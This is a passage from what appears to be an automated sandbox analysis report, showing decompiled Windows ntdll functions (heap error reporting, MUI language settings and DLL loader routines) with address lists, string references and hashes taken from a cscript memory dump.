				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E054BB150();
				} else {
					E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E054BB150("Stack trace available at %p\n", 0x55a58c0);
			}

0x05571c10
0x05571c16
0x05571c1e
0x05571c3d
0x05571c3e
0x05571c20
0x05571c35
0x05571c3a
0x05571c44
0x05571c55
0x05571c5a
0x05571c65
0x05571c67
0x00000000
0x05571c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05571c67
0x05571cdc
0x05571ce5
0x05571d04
0x05571d05
0x05571ce7
0x05571cfc
0x05571d01
0x05571d0b
0x05571d17
0x05571d1f
0x05571d25
0x05571d30
0x05571d4f
0x05571d50
0x05571d32
0x05571d47
0x05571d4c
0x05571d61
0x05571d67
0x05571d68
0x05571d6e
0x05571d79
0x05571d98
0x05571d99
0x05571d7b
0x05571d90
0x05571d95
0x05571daa
0x05571db0
0x05571db1
0x05571db7
0x05571dc2
0x05571de1
0x05571de2
0x05571dc4
0x05571dd9
0x05571dde
0x05571df3
0x05571df9
0x05571dfa
0x05571e00
0x05571e0a
0x05571e13
0x05571e32
0x05571e33
0x05571e15
0x05571e2a
0x05571e2f
0x05571e39
0x05571e4a
0x05571e02
0x05571e02
0x05571e08
0x00000000
0x00000000
0x05571e08
0x05571e5b
0x05571e7a
0x05571e7b
0x05571e5d
0x05571e72
0x05571e77
0x05571e95

Strings

heap_failure_generic, xrefs: 05571C7C
Parameter3: %p, xrefs: 05571DEE
HEAP: , xrefs: 05571C16, 05571C3D, 05571D04, 05571D4F, 05571D98, 05571DE1, 05571E32, 05571E7A
heap_failure_multiple_entries_corruption, xrefs: 05571C8A
heap_failure_unknown, xrefs: 05571C75
heap_failure_invalid_argument, xrefs: 05571CAD
heap_failure_buffer_overrun, xrefs: 05571C98
Parameter2: %p, xrefs: 05571DA5
heap_failure_listentry_corruption, xrefs: 05571CD0
Parameter1: %p, xrefs: 05571D5C
heap_failure_usage_after_free, xrefs: 05571CBB
heap_failure_invalid_allocation_type, xrefs: 05571CB4
Last known valid blocks: before - %p, after - %p, xrefs: 05571E45
heap_failure_entry_corruption, xrefs: 05571C83
Error code: %d - %s, xrefs: 05571D12
heap_failure_block_not_busy, xrefs: 05571CA6
heap_failure_internal, xrefs: 05571C6E
Heap error detected at %p (heap handle %p), xrefs: 05571C50
heap_failure_virtual_block_corruption, xrefs: 05571C91
heap_failure_cross_heap_operation, xrefs: 05571CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 05571CD7
HEAP[%wZ]: , xrefs: 05571C30, 05571CF7, 05571D42, 05571D8B, 05571DD4, 05571E25, 05571E6D
Stack trace available at %p, xrefs: 05571E86
heap_failure_buffer_underrun, xrefs: 05571C9F
heap_failure_freelists_corruption, xrefs: 05571CC9

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 1066a750660324eec56e05110fc50dc135e1d3c2e1a55374ef7063880128fff9
Instruction ID: 1bba20aae5e0688013900e62a63b805593dae355e45b5d4187a8dfa2767e3c9c
Opcode Fuzzy Hash: 1066a750660324eec56e05110fc50dc135e1d3c2e1a55374ef7063880128fff9
Instruction Fuzzy Hash: 6C613733624948DFD641DB85F48ADA177BDFB049B0B2AC42FF80A5B300D6709C50DE9A

Uniqueness

Uniqueness Score: -1.00%

Function 054C3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E054C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E054C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E054C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E054C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E054C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E054C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L054D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E054FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05501370(_t276, 0x5494e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E054FBB40(0,  &_v68, _t170);
									if(L054C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E054FBB40(_t257,  &_v68, _t243);
								if(L054C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05501370(_t278, 0x5494e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L054D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E054FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05501370(_v16, 0x5494e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E054FBB40(_t262,  &_v68, _t244);
								if(L054C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05501370(_t282, 0x5494e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E054FBB40(_t262,  &_v68, _t201);
							if(L054C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L054D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E054FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05501370(_t280, 0x5494e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E054FBB40(_t267,  &_v68, _t245);
							if(L054C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05501370(_t284, 0x5494e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E054FBB40(_t267,  &_v68, _t224);
						if(L054C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x054c3d3c
0x054c3d42
0x054c3d44
0x054c3d46
0x054c3d49
0x054c3d4c
0x054c3d4f
0x054c3d52
0x054c3d55
0x054c3d58
0x054c3d5b
0x054c3d5f
0x054c3d61
0x054c3d66
0x05518213
0x05518218
0x054c4085
0x054c4088
0x054c408e
0x054c4094
0x054c409a
0x054c40a0
0x054c40a6
0x054c40a9
0x054c40af
0x054c40b6
0x054c40bd
0x054c40bd
0x054c3d83
0x0551821f
0x05518229
0x05518238
0x05518238
0x0551823d
0x0551823d
0x054c3da0
0x054c3daf
0x054c3db5
0x054c3dba
0x054c3dba
0x054c3dd4
0x054c3e94
0x054c3eab
0x054c3f6d
0x054c3f84
0x054c406b
0x054c406b
0x054c406e
0x054c406e
0x054c4070
0x054c4074
0x05518351
0x05518351
0x054c407a
0x054c407f
0x0551835d
0x05518370
0x05518377
0x05518379
0x0551837c
0x0551837c
0x0551835d
0x00000000
0x054c407f
0x054c3f8a
0x054c3f8d
0x054c3f90
0x054c3f95
0x0551830d
0x0551830f
0x054c3f9b
0x054c3fac
0x054c3fae
0x054c3fb1
0x054c3fb1
0x054c3fb6
0x05518317
0x0551831a
0x00000000
0x054c3fbc
0x054c3fc1
0x054c3fc9
0x054c3fd7
0x054c3fda
0x054c3fdd
0x054c4021
0x054c4021
0x054c4029
0x054c4030
0x054c4044
0x054c4046
0x054c4046
0x054c4044
0x054c4049
0x05518327
0x05518334
0x05518339
0x0551833c
0x054c404f
0x054c404f
0x054c404f
0x054c4051
0x054c4056
0x054c4063
0x054c4063
0x054c4068
0x00000000
0x054c4068
0x054c3fdf
0x054c3fe2
0x054c3fe4
0x054c3fe7
0x054c3fef
0x054c4003
0x054c4005
0x054c4005
0x054c400c
0x054c4013
0x054c4016
0x054c4017
0x054c401b
0x054c401e
0x00000000
0x054c401e
0x054c3fb6
0x054c3eb1
0x054c3eb4
0x054c3eb7
0x054c3ebc
0x055182a9
0x055182ab
0x054c3ec2
0x054c3ed3
0x054c3ed5
0x054c3ed8
0x054c3ed8
0x054c3edd
0x055182b3
0x055182b6
0x00000000
0x054c3ee3
0x054c3ee8
0x054c3eed
0x054c3ef0
0x054c3ef3
0x054c3f02
0x054c3f05
0x054c3f08
0x055182c0
0x055182c3
0x055182c5
0x055182c8
0x055182d0
0x055182e4
0x055182e6
0x055182e6
0x055182ed
0x055182f4
0x055182f7
0x055182f8
0x055182fc
0x055182ff
0x055182ff
0x054c3f0e
0x054c3f11
0x054c3f16
0x054c3f1d
0x054c3f31
0x05518307
0x05518307
0x054c3f31
0x054c3f39
0x054c3f48
0x054c3f4d
0x054c3f50
0x054c3f50
0x054c3f53
0x054c3f58
0x054c3f65
0x054c3f65
0x054c3f6a
0x00000000
0x054c3f6a
0x054c3edd
0x054c3dda
0x054c3ddd
0x054c3de0
0x054c3de5
0x05518245
0x054c3deb
0x054c3df7
0x054c3dfc
0x054c3dfe
0x054c3e01
0x054c3e01
0x054c3e06
0x0551824d
0x0551824f
0x05518254
0x00000000
0x054c3e0c
0x054c3e11
0x054c3e16
0x054c3e19
0x054c3e29
0x054c3e2c
0x054c3e2f
0x0551825c
0x0551825f
0x05518261
0x05518264
0x0551826c
0x05518280
0x05518282
0x05518282
0x05518289
0x05518290
0x05518293
0x05518294
0x05518298
0x0551829b
0x0551829b
0x054c3e35
0x054c3e38
0x054c3e3d
0x054c3e44
0x054c3e58
0x055182a3
0x055182a3
0x054c3e58
0x054c3e60
0x054c3e6f
0x054c3e74
0x054c3e77
0x054c3e77
0x054c3e7a
0x054c3e7f
0x054c3e8c
0x054c3e8c
0x054c3e91
0x00000000
0x054c3e91

Strings

Kernel-MUI-Language-SKU, xrefs: 054C3F70
Kernel-MUI-Language-Allowed, xrefs: 054C3DC0
Kernel-MUI-Number-Allowed, xrefs: 054C3D8C
Kernel-MUI-Language-Disallowed, xrefs: 054C3E97
WindowsExcludedProcs, xrefs: 054C3D6F

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 255f95fb0dffc6643ac3deb7bc42535e00ef77b3c866ba186b7c5be94d293d65
Instruction ID: beafe7c1d942a742bff3ec28f6ec5150455974800c46547f80cc2a9e0163378e
Opcode Fuzzy Hash: 255f95fb0dffc6643ac3deb7bc42535e00ef77b3c866ba186b7c5be94d293d65
Instruction Fuzzy Hash: 15F14B76E00618EBCF55DF99C984EEEBBB9FF48650F14449BE905A7210E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054E8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E054E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x55ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x55a8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x55a5780 & 0x00000003) != 0) {
							E05535510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x55a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E054FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x55a7984; // 0x36b2aa8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x55a8464; // 0x75150110
					 *0x55ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E054E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x55a5780 & 0x00000005) != 0) {
						_push(_t49);
						E05535510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x054e8e0f
0x054e8e16
0x054e8e19
0x054e8e1b
0x054e8e21
0x054e8e7f
0x054e8e85
0x05529354
0x0552936c
0x05529371
0x0552937b
0x05529381
0x05529381
0x0552937b
0x054e8e9d
0x054e8e9d
0x054e8e29
0x054e8e2c
0x054e8e38
0x054e8e3e
0x054e8e43
0x054e8eb5
0x054e8eb9
0x055292aa
0x055292af
0x055292e8
0x055292e8
0x055292af
0x054e8eb9
0x054e8e45
0x054e8e53
0x054e8e5b
0x054e8e5f
0x054e8e78
0x054e8e78
0x054e8e7d
0x054e8ec3
0x054e8ecd
0x054e8ed2
0x054e8ed2
0x054e8ec5
0x054e8ec5
0x00000000
0x054e8e7d
0x054e8e67
0x054e8ea4
0x0552931a
0x00000000
0x00000000
0x05529320
0x054e8ea4
0x054e8e70
0x05529325
0x05529340
0x05529345
0x05529345
0x054e8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0552933B, 05529367
Querying the active activation context failed with status 0x%08lx, xrefs: 05529357
LdrpFindDllActivationContext, xrefs: 05529331, 0552935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0552932A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 990a3d100520b9c643cf5f1c4c433e5856e02ab92d127503e187c4bbd26055c3
Instruction ID: 119e01c930923a945b59bf9d7b3dea0e8b1402891632c204befe3410f52e3058
Opcode Fuzzy Hash: 990a3d100520b9c643cf5f1c4c433e5856e02ab92d127503e187c4bbd26055c3
Instruction Fuzzy Hash: 5D413B32A043159EDF35AB5C884AEF77B76BB01256F0545ABE405D7290EB706C8093C1

Uniqueness

Uniqueness Score: -1.00%

Function 054C8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E054C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E054C934A() != 0) {
								_t159 = E0553A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x55a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05535510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x55a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E054C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E054C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E054C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x55a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x55a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E054D2280(_t92, 0x55a86cc);
															_t94 = E05589DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E054E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x55a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E054C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x55a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x55a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E054FF380(_t136, 0x5491184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E054D2280(_t108, 0x55a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E054E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05589D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E054CFFB0(_t118, _t156, 0x55a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
